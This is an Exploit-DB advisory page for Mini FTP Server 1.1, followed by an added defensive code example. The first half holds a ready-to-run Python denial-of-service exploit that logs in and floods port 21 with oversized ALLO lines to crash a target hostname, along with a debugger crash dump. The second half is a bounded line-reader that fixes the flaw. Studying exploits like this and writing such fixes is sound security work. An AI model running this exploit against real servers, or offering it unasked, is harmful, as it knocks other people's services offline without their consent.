Mini FTP Server 1.1 – Buffer Corruption Remote Denial of Service

  • Author: LiquidWorm
    Date: 2011-08-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17742/
#!/usr/bin/python
#
#
# Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service Exploit
#
#
# Vendor: webmaster442
# Product web page: http://miniftpserver.codeplex.com
# Affected version: 1.1.1.0
#
# Summary: Minimal FTP server for windows. Uses only managed code. Works
# with Total commander.
#
# Desc: MiniFTPServer suffers from a denial of service vulnerability
# when passing large number of bytes after authentication, resulting
# in a crash. No need for a valid FTP command to exploit this issue.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# -----------------------------------------------------------------
#
# (1540.918): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00e4f900 ebx=00000000 ecx=00000000 edx=00f163e8 esi=00e4f900 edi=055ef384
# eip=031187d3 esp=055ef154 ebp=055ef394 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# 031187d3 3909            cmp     dword ptr [ecx],ecx  ds:0023:00000000=????????
# 0:011> d edx
# 00f163e8  80 6a 9f 7a 28 f9 c5 00-00 00 00 00 64 f1 dc 00  .j.z(.......d...
# 00f163f8  54 72 f1 00 00 00 00 00-00 00 00 00 01 00 00 80  Tr..............
# 00f16408  00 00 00 00 4c 64 f1 00-00 00 00 00 00 00 00 00  ....Ld..........
# 00f16418  18 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
# 00f16428  b0 f1 dc 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
# 00f16438  00 00 00 00 00 00 00 00-f4 01 00 00 50 f9 e4 00  ............P...
# 00f16448  00 00 00 00 68 b4 b9 79-00 00 00 00 70 64 f1 00  ....h..y....pd..
# 00f16458  00 00 00 00 00 00 00 00-00 00 00 00 80 72 f1 00  .............r..
# 0:011> d
# 00f16468  00 00 00 00 00 00 00 00-f0 b0 5c 7b 00 00 00 00  ..........\{....
# 00f16478  80 9f b9 00 84 64 f1 00-00 00 01 00 60 9e b9 79  .....d......`..y
# 00f16488  c4 1a a0 00 00 00 00 00-00 00 00 00 ac f9 b9 79  ...............y
# 00f16498  f4 01 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
# 00f164a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 00f164b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 00f164c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 00f164d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
#
# -----------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2011-5040
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5040.php
#
#
# 28.08.2011
#

import socket
import sys

if len(sys.argv) < 2:
    print("\n===============================================")
    print("\nMini FTP Server 1.1 Remote DoS Exploit\n")
    print("Zero Science Lab - http://www.zeroscience.mk")
    print("\nID: ZSL-2011-5040")
    print("\n===============================================")
    print("\n - Usage: " + sys.argv[0] + " [hostname]\n")
    sys.exit(0)

host = sys.argv[1]
data = "A@" * 50000  # Any char and combination would do
cmd = "ALLO"         # Any CMD would do, or no CMD at all
# Encode once so the same script runs under Python 2 and Python 3
payload = (cmd + " " + data + "\r\n").encode()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("\r\n[+] Attacking: " + host + "\r\n")
print("[*] Please be patient...\r\n")

try:
    s.connect((host, 21))
    print(s.recv(1024))  # server banner
    s.send(b"USER username\r\n")
    print(s.recv(1024))
    s.send(b"PASS password\r\n")
    print(s.recv(1024))
    s.send(payload)      # first oversized line, sent after authentication
    print(s.recv(1024))
    print("[*] Please be patient...\r\n")
    for x in range(0, 10):
        s.send(payload)
    print(s.recv(1024))
    s.close()

    # A closed socket cannot be reconnected, so the liveness check needs a
    # fresh one; otherwise "Host is down!" would be printed unconditionally.
    try:
        check = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        check.connect((host, 21))
        check.close()
    except socket.error:
        print("\r\n[*] Host is down!")

except socket.error:
    print("[*] Oops!")
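The defect the advisory describes is a command reader that keeps accumulating bytes until a line terminator arrives, so a client that never sends CRLF drives the buffer until the process falls over. The block below is an added example, not Mini FTP Server's code and not part of the original advisory: a bounded command-line reader that enforces a per-line ceiling, replies 500 and ends the session once it is exceeded, and keeps its memory use bounded by the ceiling plus one receive chunk no matter how much the peer sends. `BoundedLineReader`, `handle_session`, `FakeSocket`, the 512-byte limit and the `200`/`221`/`500` replies are assumptions made for the demo; the transcript fed to `FakeSocket` is constructed.

```python
"""Bounded FTP command-line reading (added example; names and limits are assumptions)."""

MAX_LINE = 512  # assumed ceiling for one command line, terminator excluded


class LineTooLong(Exception):
    """Raised when a command line exceeds the configured ceiling."""


class BoundedLineReader:
    """Reads CRLF-terminated lines from a recv(n) callable without ever
    buffering more than max_len + chunk bytes."""

    def __init__(self, recv, max_len=MAX_LINE, chunk=256):
        self._recv = recv
        self._max = max_len
        self._chunk = chunk
        self._buf = bytearray()
        self.peak_buffered = 0  # largest buffer size seen, for the demo's assertion

    def readline(self):
        while True:
            end = self._buf.find(b"\r\n")
            if end != -1:
                line = bytes(self._buf[:end])
                del self._buf[:end + 2]  # keep whatever followed the terminator
                if len(line) > self._max:
                    raise LineTooLong(len(line))
                return line
            if len(self._buf) > self._max:
                # No terminator within the ceiling: stop reading instead of growing.
                size = len(self._buf)
                self._buf.clear()
                raise LineTooLong(size)
            data = self._recv(self._chunk)
            if not data:
                raise ConnectionError("peer closed before CRLF")
            self._buf += data
            self.peak_buffered = max(self.peak_buffered, len(self._buf))


def handle_session(recv, max_len=MAX_LINE):
    """Minimal command loop. Returns (replies, peak_buffered). Any verb is
    acknowledged; the session ends on QUIT, on peer close, or on the first
    oversized line, which gets a 500 reply and no further reads."""
    reader = BoundedLineReader(recv, max_len)
    replies = []
    try:
        while True:
            line = reader.readline()
            verb = line.split(b" ", 1)[0].upper()
            if verb == b"QUIT":
                replies.append(b"221 Goodbye.\r\n")
                break
            replies.append(b"200 OK " + verb + b"\r\n")
    except LineTooLong:
        replies.append(b"500 Line too long.\r\n")
    except ConnectionError:
        pass
    return replies, reader.peak_buffered


class FakeSocket:
    """Constructed stand-in for socket.recv, fed from a byte string (demo only)."""

    def __init__(self, data):
        self._data = data
        self._pos = 0

    def recv(self, n):
        chunk = self._data[self._pos:self._pos + n]
        self._pos += len(chunk)
        return chunk


def demo():
    # Constructed transcripts: a normal login, and the advisory's oversized
    # line (ALLO followed by 100000 bytes) sent after authentication.
    normal = FakeSocket(b"USER u\r\nPASS p\r\nQUIT\r\n")
    oversized = FakeSocket(b"USER u\r\nPASS p\r\nALLO " + b"A@" * 50000 + b"\r\n")
    return handle_session(normal.recv), handle_session(oversized.recv)


if __name__ == "__main__":
    for replies, peak in demo():
        print(replies, "peak buffered:", peak)
```

The reader checks the ceiling before every further `recv`, so a peer that streams data without a terminator is cut off after at most one chunk past the limit; the `peak_buffered` counter exists only to make that bound visible.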